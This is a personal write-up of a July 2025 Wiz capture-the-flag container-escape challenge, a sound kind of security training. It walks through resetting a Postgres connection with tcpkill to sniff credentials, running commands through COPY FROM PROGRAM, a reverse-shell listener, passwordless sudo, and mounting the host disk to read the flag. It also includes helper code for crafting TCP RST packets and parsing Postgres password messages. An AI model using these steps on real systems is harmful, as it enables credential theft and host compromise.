Wiz Cloud Security Championship July 2025

Introduction

The August challenge has been released, so here is my write-up for July.

Contain Me If You Can

Once again, we have a terminal and a couple of messages. The challenge description is:

You've found yourself in a containerized environment.

To get the flag, you must move laterally and escape your container. Can you do it?

The flag is placed at /flag on the host's file system.

Good luck!

Within the terminal:

Loading...

Creating containers...

Starting services... done

The flag is placed at /flag on the host's file system. Good luck!

OK, so we need to break out of the container. Let’s start investigating the container and get our bearings.

root@8854e1232dcd:/# ps aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.1 2696 1020 ? Ss 09:56 0:00 sleep infinity

root 6 0.0 0.3 4588 3936 pts/0 Ss 09:56 0:00 bash

root 15 0.0 0.3 7888 3852 pts/0 R+ 09:58 0:00 ps aux

root@8854e1232dcd:/# mount

overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/M5PDUUDG4MA3YDHF4MGA5RKEXN:/var/lib/docker/overlay2/l/PUDUWBLOUV4KDA226EAPOCLY7U:/var/lib/docker/overlay2/l/DADW4QRM2QMV7JYQKZLCFHSXW3:/var/lib/docker/overlay2/l/FJGPNHG4APZTCSAAQUZTLVUW2O,upperdir=/var/lib/docker/overlay2/1fc07caa25330d59533ba19cd1a9e8ff8aaadd5bc3bf85c1d5a2b988b00dbb79/diff,workdir=/var/lib/docker/overlay2/1fc07caa25330d59533ba19cd1a9e8ff8aaadd5bc3bf85c1d5a2b988b00dbb79/work)

proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)

tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)

devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)

sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)

cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime)

mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)

shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

/dev/vdb on /etc/resolv.conf type ext4 (rw,relatime)

/dev/vdb on /etc/hostname type ext4 (rw,relatime)

/dev/vdb on /etc/hosts type ext4 (rw,relatime)

proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)

proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)

proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)

proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)

proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)

tmpfs on /proc/acpi type tmpfs (ro,relatime)

tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)

tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)

tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)

tmpfs on /proc/scsi type tmpfs (ro,relatime)

tmpfs on /sys/firmware type tmpfs (ro,relatime)

root@8854e1232dcd:~# grep -ri capeff /proc/self/status

CapEff: 00000000a80425fb

$ capsh --decode=0x00000000a80425fb

0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

[..SNIP..]

Nothing immediately springs to mind so far. Maybe in the network? I spend a bit of time investigating the network, identifying routes, looking for listening ports, etc.


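
If netstat is not available in a container, the same connection table can be read straight from /proc/net/tcp. Below is a minimal Python sketch of that, assuming a little-endian host (addresses in that file are hex-encoded in host byte order). The function names are illustrative, and the sample line is hand-built from the addresses that appear in this write-up, not copied from the challenge.

```python
import socket
import struct

# A few TCP states as encoded (in hex) in /proc/net/tcp.
TCP_STATES = {"01": "ESTABLISHED", "06": "TIME_WAIT", "0A": "LISTEN"}


def decode_addr(hex_addr):
    """Turn '030013AC:C0BC' into ('172.19.0.3', 49340) on a little-endian host."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Return (local, remote, state) tuples, one per socket line."""
    rows = []
    for line in text.splitlines()[1:]:  # the first line is the column header
        parts = line.split()
        if len(parts) < 4:
            continue
        state = TCP_STATES.get(parts[3], parts[3])
        rows.append((decode_addr(parts[1]), decode_addr(parts[2]), state))
    return rows


# Illustrative sample only (assumption): built by hand, not taken from the challenge.
PROC_NET_TCP_SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 030013AC:C0BC 020013AC:1538 01 00000000:00000000 00:00000000 00000000     0        0 12345 1
"""

if __name__ == "__main__":
    for local, remote, state in parse_proc_net_tcp(PROC_NET_TCP_SAMPLE):
        print(local, "->", remote, state)
```

On a real system you would pass in the contents of /proc/net/tcp instead of the sample string.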

The main thing I note is that there is a DB on 172.19.0.2 and, based on netstat, our container appears to have a connection to what looks like the postgres database. Let’s confirm that with tcpdump.

root@8854e1232dcd:~# tcpdump -i any -A -s0

tcpdump: data link type LINUX_SLL2

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode

listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes

10:06:32.260329 eth0 Out IP 8854e1232dcd.49340 > postgres_db.user_db_network.postgresql: Flags [.], ack 137488650, win 501, options [nop,nop,TS val 3368586412 ecr 1800431535], length 0

E..4r>@...1Z...........87..-.1.

....XR.....

....kPg.

10:06:32.260448 eth0 In IP postgres_db.user_db_network.postgresql > 8854e1232dcd.49340: Flags [.], ack 1, win 509, options [nop,nop,TS val 1800436655 ecr 3368576134], length 0

E..4..@..............8...1.

7.......XR.....

kP{...d.

Let’s grab a larger dump and export it to open in Wireshark. I export the capture from the container by sending the file over netcat to one of my servers, from where I can easily fetch it.

It looks to be a regular query of SELECT now(), sent to the database seen in the scans.

Trying to access the database, I get blocked by not knowing the credentials. Clearly the process communicating has the credentials. It looks to be coming from another container sharing our network namespace. Unfortunately, I can’t see an immediate way to access that process to get its credentials.

For a while, I think about hijacking the existing TCP connection by scripting something up in Scapy to send raw TCP packets that would fall within the existing stream, before realising that might not work. I also didn’t want to do any coding in the web terminal; it’s just not ideal for it.

Next thought: could I reset the TCP connection by sending a RST packet and force the process to re-authenticate? After some Googling, I find tcpkill, which basically does that and is installed in the container. I am probably on the correct path here. Looking at its options, I need to give it a tcpdump expression that selects the connection.
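
For a sense of what a tool like tcpkill puts on the wire, here is a rough Python sketch that builds a bare TCP header with only the RST flag set. It only constructs bytes and sends nothing. `build_rst` and `checksum` are illustrative names of my own, and the real tool additionally sniffs traffic so it can pick sequence numbers the peer will accept.

```python
import socket
import struct


def checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_rst(src_ip, dst_ip, sport, dport, seq):
    """Build a 20-byte TCP header with the RST flag set and a valid checksum."""
    offset_flags = (5 << 12) | 0x04  # header length of 5 words, RST bit
    # Fields: ports, seq, ack=0, offset/flags, window=0, checksum=0, urgent=0.
    header = struct.pack("!HHIIHHHH", sport, dport, seq, 0, offset_flags, 0, 0, 0)
    # The TCP checksum also covers a pseudo-header: addresses, protocol, length.
    pseudo = socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
    pseudo += struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(header))
    csum = checksum(pseudo + header)
    return header[:16] + struct.pack("!H", csum) + header[18:]


if __name__ == "__main__":
    segment = build_rst("172.19.0.3", "172.19.0.2", 49340, 5432, 137493538)
    print(segment.hex())
```

A reset is only honoured if its sequence number falls inside the receiver's window, which is why a sniffing tool has an easier time than a blind script.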

Let’s start a tcpdump running in the background, and then just start killing things.

root@8854e1232dcd:~# tcpdump -i any -A -s0 -w output.pcap &

[1] 240

tcpdump: data link type LINUX_SLL2

tcpdump: listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes

root@8854e1232dcd:~# tcpkill -i eth0 port 5432

tcpkill: listening on eth0 [port 5432]

172.19.0.3:49340 > 172.19.0.2:5432: R 137493538:137493538(0) win 0

172.19.0.3:49340 > 172.19.0.2:5432: R 137494039:137494039(0) win 0

172.19.0.3:49340 > 172.19.0.2:5432: R 137495041:137495041(0) win 0

172.19.0.2:5432 > 172.19.0.3:49340: R 937287491:937287491(0) win 0

172.19.0.2:5432 > 172.19.0.3:49340: R 937288000:937288000(0) win 0

172.19.0.2:5432 > 172.19.0.3:49340: R 937289018:937289018(0) win 0

I assume those are connections it’s killed? Let’s stop the tcpkill and give it some time and then export the capture again.





Success! We have forced the re-authentication.

We now have all the details needed to connect.
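
Wireshark does the decoding here, but the messages involved are simple enough to parse by hand. The Python sketch below reads a PostgreSQL protocol 3.0 StartupMessage (user and database) and a password message. It assumes the server asked for a cleartext password; with MD5 or SCRAM authentication the 'p' message would not contain the password itself. The function names and the "example" password in the usage are placeholders, not values from the challenge.

```python
import struct

PROTOCOL_V3 = 196608  # 3 << 16, i.e. protocol version 3.0


def parse_startup_message(payload):
    """Parse a StartupMessage into a dict of its parameters."""
    length, version = struct.unpack("!II", payload[:8])
    if version != PROTOCOL_V3:
        raise ValueError("not a v3 StartupMessage")
    fields = payload[8:length].split(b"\x00")
    # Fields alternate name, value, name, value; the tail is empty terminators.
    pairs = zip(fields[0::2], fields[1::2])
    return {k.decode(): v.decode() for k, v in pairs if k}


def parse_password_message(payload):
    """Parse a 'p' message, which holds the password under cleartext auth."""
    if payload[:1] != b"p":
        raise ValueError("not a password message")
    (length,) = struct.unpack("!I", payload[1:5])  # length excludes the type byte
    return payload[5:1 + length].rstrip(b"\x00").decode()


if __name__ == "__main__":
    body = b"user\x00user\x00database\x00mydatabase\x00\x00"
    startup = struct.pack("!II", 8 + len(body), PROTOCOL_V3) + body
    print(parse_startup_message(startup))

    secret = b"example\x00"  # placeholder password (assumption)
    print(parse_password_message(b"p" + struct.pack("!I", 4 + len(secret)) + secret))
```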

root@8854e1232dcd:~# psql -h 172.19.0.2 -U user mydatabase

Password for user user:

psql (16.9 (Ubuntu 16.9-0ubuntu0.24.04.1), server 16.8)

Type "help" for help.

mydatabase=# \dt

Did not find any relations.

And we’re in. No obvious tables though.

mydatabase=# \du

user | Superuser, Create role, Create DB, Replication, Bypass RLS

We are a superuser though, so we should have enough permissions for command execution. PostgreSQL’s COPY command has a PROGRAM option that allows command execution. Let’s try it.

mydatabase=# CREATE TABLE exec(output text);

CREATE TABLE

mydatabase=# COPY exec FROM PROGRAM 'id';

COPY 1

mydatabase=# SELECT * FROM exec;

uid=70(postgres) gid=70(postgres) groups=10(wheel),70(postgres)
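
Commands more involved than `id` tend to contain single quotes, which have to be doubled inside the SQL string literal. A small Python sketch of building the statement safely; `sql_literal` and `copy_from_program` are hypothetical helper names, and the table name is assumed to be a trusted identifier such as the `exec` table created above.

```python
def sql_literal(value):
    """Quote a string as a standard SQL literal by doubling single quotes."""
    return "'" + value.replace("'", "''") + "'"


def copy_from_program(table, command):
    """Build a COPY ... FROM PROGRAM statement for a shell command."""
    return "COPY {} FROM PROGRAM {};".format(table, sql_literal(command))


if __name__ == "__main__":
    print(copy_from_program("exec", "id"))
    print(copy_from_program("exec", "echo 'hi'"))
```

The generated statement can then be pasted into the psql prompt as-is.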

Nice. Let’s establish a quick reverse shell. I do not want to be doing this via postgres if I can avoid it.

$ nc -nlvp 8080

Listening on 0.0.0.0 8080

Connection received on 104.196.223.153 45661

id

id

uid=70(postgres) gid=70(postgres) groups=10(wheel),70(postgres)

Now it should be easier to enumerate the container.

sudo -l

Matching Defaults entries for postgres on 032c93ff87db:

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for postgres:

Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User postgres may run the following commands on 032c93ff87db:

(ALL) NOPASSWD: ALL

Well… that’s convenient.

sudo -s

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

And we’re root xD

cat /proc/self/status | grep -i capeff

CapEff: 0000003fffffffff

$ capsh --decode=0x0000003fffffffff

0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read

And now we have access to all of the capabilities.
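
When capsh is not to hand, the CapEff mask is easy to decode manually, since each bit maps to one capability. A minimal Python sketch, with the bit order taken from linux/capability.h as I understand it; `decode_caps` is an illustrative name. It compares the mask from the first container with the one we have now.

```python
# Capability names indexed by bit position (bit 0 first).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]


def decode_caps(mask):
    """Return the names of every capability whose bit is set in mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


if __name__ == "__main__":
    first = decode_caps(0x00000000A80425FB)   # the initial container
    second = decode_caps(0x0000003FFFFFFFFF)  # root in the postgres container
    print("gained:", sorted(set(second) - set(first)))
```

The difference between the two lists is what matters for the escape: cap_sys_admin, which mount needs, is only present in the second one.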

ls /dev

autofs

core

cpu

cpu_dma_latency

[..SNIP..]

vcs

vcs1

vcsa

vcsa1

vcsu

vcsu1

vda

vdb

vsock

zero

I think this is a privileged container. We have all the capabilities, and we have the host’s devices exposed under /dev. The easiest way to break out in these scenarios is to just mount the root filesystem. We can usually figure out which device this is through mount.

mount

Hmm.. no output.. weird. Never mind, /proc/self/mounts will have the info.

cat /proc/self/mounts

overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/2R7B77YGXIUTUU6CFKAG6CBKPF:/var/lib/docker/overlay2/l/6C7BHZRCDWZ3454X6WUDBC4VA3:/var/lib/docker/overlay2/l/GPAK4BP3IJZN7FYCUNOIKKKZKH:/var/lib/docker/overlay2/l/YIAP3A366SVVLLV4HLXEDDQGZ6:/var/lib/docker/overlay2/l/KELC6NF4ZWS62ACWOXK3JHTJ77:/var/lib/docker/overlay2/l/2ZWKPS4IS7UZNVTGUSUO6VVSKF:/var/lib/docker/overlay2/l/G463JY3WEGNDKXLE4MYMN3V4LM:/var/lib/docker/overlay2/l/44REHRNPNNUENIM5D2DYX56WQ7:/var/lib/docker/overlay2/l/2AKMBCWBVTU7JAYTSJ7BJQPK4F:/var/lib/docker/overlay2/l/3FZ5X2VXSI7KQPMBQZGVIAWG3L:/var/lib/docker/overlay2/l/BZYOU6HJPN4P6RB3KINYQMYAHD:/var/lib/docker/overlay2/l/NXVADRV4EMPSR4RA76Q67NFVGR:/var/lib/docker/overlay2/l/VNLLPOEQ24TES64LV5ZZQZUIUZ:/var/lib/docker/overlay2/l/JRT7LIV2MYQN2HVU5OFFT4X545:/var/lib/docker/overlay2/l/SXOS3YCN7CLBXC47EMW5SGBQQU:/var/lib/docker/overlay2/l/HNFHFFRXNB4SVKQ5REG7JK3HQH:/var/lib/docker/overlay2/l/MUGEU4KDHN3WW6ESMN7E5TZBLY:/var/lib/docker/overlay2/l/73ZNGFMKRC5B4JOBLHIGTFHGAS,upperdir=/var/lib/docker/overlay2/78e4be8056a8c3297ad2836b9b522e0ab363fd4fb9a26679c3330eb3a87819a8/diff,workdir=/var/lib/docker/overlay2/78e4be8056a8c3297ad2836b9b522e0ab363fd4fb9a26679c3330eb3a87819a8/work 0 0

proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0

tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755 0 0

devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0

sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0

cgroup /sys/fs/cgroup cgroup2 rw,nosuid,nodev,noexec,relatime 0 0

mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0

shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k 0 0

/dev/vdb /etc/resolv.conf ext4 rw,relatime 0 0

/dev/vdb /etc/hostname ext4 rw,relatime 0 0

/dev/vdb /etc/hosts ext4 rw,relatime 0 0

/dev/vdb /var/lib/postgresql/data ext4 rw,relatime 0 0

Looks to be mounted from /dev/vdb, let’s mount that.
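
With long overlay lines in the way, it can help to filter the mounts table down to entries backed by a device node. A minimal Python sketch that does this; `device_mounts` is an illustrative name, and the sample is a shortened copy of the output above.

```python
def device_mounts(mounts_text):
    """Map each /dev/* source in a mounts table to its list of mount points."""
    devices = {}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[0].startswith("/dev/"):
            devices.setdefault(fields[0], []).append(fields[1])
    return devices


# Shortened copy of the /proc/self/mounts output shown above.
MOUNTS_SAMPLE = """\
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755 0 0
/dev/vdb /etc/resolv.conf ext4 rw,relatime 0 0
/dev/vdb /etc/hostname ext4 rw,relatime 0 0
/dev/vdb /etc/hosts ext4 rw,relatime 0 0
/dev/vdb /var/lib/postgresql/data ext4 rw,relatime 0 0
"""

if __name__ == "__main__":
    for device, points in device_mounts(MOUNTS_SAMPLE).items():
        print(device, "->", ", ".join(points))
```

In a live container you would feed it the contents of /proc/self/mounts rather than the sample.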

mount /dev/vdb /mnt

ls /mnt

buildkit

containerd

containers

image

lost+found

network

overlay2

plugins

runtimes

swarm

tmp

trust

volumes

Oh.. this doesn’t look to be the root filesystem, but a partition containing the /var/lib/docker/ folder. I wonder if it’s just different disks under the hood. vdb suggests it’s a second disk. I wonder if we need vda?

ls /dev/vda -l

brw------- 1 root root 254, 0 Aug 28 09:56 /dev/vda

It does exist. Let’s mount it and see what’s in it.

umount /mnt

mount /dev/vda /mnt

ls /mnt

bin

boot

dev

etc

flag

home

lib

lib32

lib64

libx32

lost+found

media

mnt

opt

overlay

proc

rom

root

run

sbin

srv

sys

tmp

usr

var

Excellent. We can now get the flag.

cat /mnt/flag

WIZ_CTF{how_the_tables_have_turned_guests_to_hosts}

There’s the flag, and that is challenge 2 complete.

Talking to the Wiz folk afterwards, I learned that my final breakout wasn’t the intended solution; the intention was to use core_pattern. Ooops.